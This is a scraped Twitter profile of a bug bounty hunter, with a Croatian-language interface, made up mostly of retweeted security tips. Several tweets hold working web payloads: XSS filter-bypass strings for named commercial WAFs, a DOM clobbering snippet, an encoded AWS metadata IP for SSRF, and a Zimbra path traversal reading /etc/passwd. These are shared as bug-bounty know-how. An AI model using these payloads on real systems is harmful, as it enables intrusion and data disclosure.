Armaan Pathan

@armaancrockroax

OSCP | Bug Bounty Hunter | Keen Learner | Security Engineer ✈️

Gandhinagar,gujarat,India
Vrijeme pridruživanja: lipanj 2012.

Tweetovi

Blokirali ste korisnika/cu @armaancrockroax

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @armaancrockroax

  1. Prikvačeni tweet
    6. tra 2019.

    I just published Scary Bug in Burp Suite Upstream Proxy Allows Hackers to Hack Hackers

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet

    Chrome:<iframe name=windowplz> </iframe> <script> windowplz.alert(1) </script> Based on 's DOM Clobbering research.

    Poništi
  3. 5. velj
    Poništi
  4. 5. velj
    Poništi
  5. proslijedio/la je Tweet
    4. velj

    When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018)

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    1. sij

    Why not step into the next decade with WAF bypasses? Here are some gifts.😎 - Imperva <a69/onclick=write&lpar;&rpar;>pew - DotDefender <a69/onclick=[0].map(alert)>pew - Cloudbric <a69/onclick=[1].findIndex(alert)>pew Happy 0x32303230.😉

    Poništi
  7. proslijedio/la je Tweet
    10. svi 2019.

    Akamai WAF bypass XSS in HTML-context when no character-filtering exists to trick it: <style> a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>

    Poništi
  8. proslijedio/la je Tweet
    30. sij

    Off-Facebook activity by Facebook is very insightful and yet scary. I don't use Facebook anymore, but apps on my phone do share everything with Facebook 😲😲😲😲

    Poništi
  9. proslijedio/la je Tweet
    29. sij
    Odgovor korisnicima i sljedećem broju korisnika:

    Try this: cat domains.txt | while read domain; do if host -t A "$domain" | awk '{print }' | grep -E '^(192\.168\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|10\.)' &>/dev/null; then echo ; fi; done Disclaimer: wrote it just now and haven't tested it much :-P

    Poništi
  10. proslijedio/la je Tweet
    16. stu 2019.
    Poništi
  11. proslijedio/la je Tweet
    14. sij

    We are planning to do AMA's for Indian bug hunters, what questions would you like us to include in AMA?

    Poništi
  12. proslijedio/la je Tweet
    14. sij

    BTW it's funny how these people are criticizing over releasing the exploit and saying skids will hack organizations now but low key dropping sensitive Netscaler post-exploitation files like ns.conf / session files and stuff. To help whom, the skids? 1/2

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    14. sij

    Shout-out to for being first to drop a working exploit of CVE-2019-19781

    Poništi
  14. proslijedio/la je Tweet
    10. sij

    We just released the exploit for Remote Code Execution on Citrix Application Delivery Controller and Citrix Gateway (CVE-2019-19781)

    Poništi
  15. proslijedio/la je Tweet
    9. sij

    Have reproduced Citrix SSL VPN pre-auth RCE successfully on both local and remote. Interesting bug!

    Poništi
  16. proslijedio/la je Tweet
    3. sij

    P1 on new year (zimbra LFI) []/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00

    Poništi
  17. proslijedio/la je Tweet
    29. pro 2019.

    Time for - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results.

    Poništi
  18. proslijedio/la je Tweet
    27. pro 2019.

    It was great meeting you in person hope will meet soon again with your another nightmare stories 😹😂😂 with 😂🤣🤣😂😂🤣

    , , i još njih 3
    Poništi
  19. 27. pro 2019.

    - Be a better person - will take care of health - more time to family - bug hunting only in weekends (friday only) - will take a deep dive in python + algorithms and also will learn automation - build at least one burp plugin.

    Poništi
  20. 27. pro 2019.

    I wont write any numbers that how much I earned and blah blah blah! I will just say, i have achived everything expect getting OSCE certification! #2019 was blast for me. Thanks everyone who has supported me in achieving my goals.

    Poništi
  21. proslijedio/la je Tweet
    24. pro 2019.

    Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·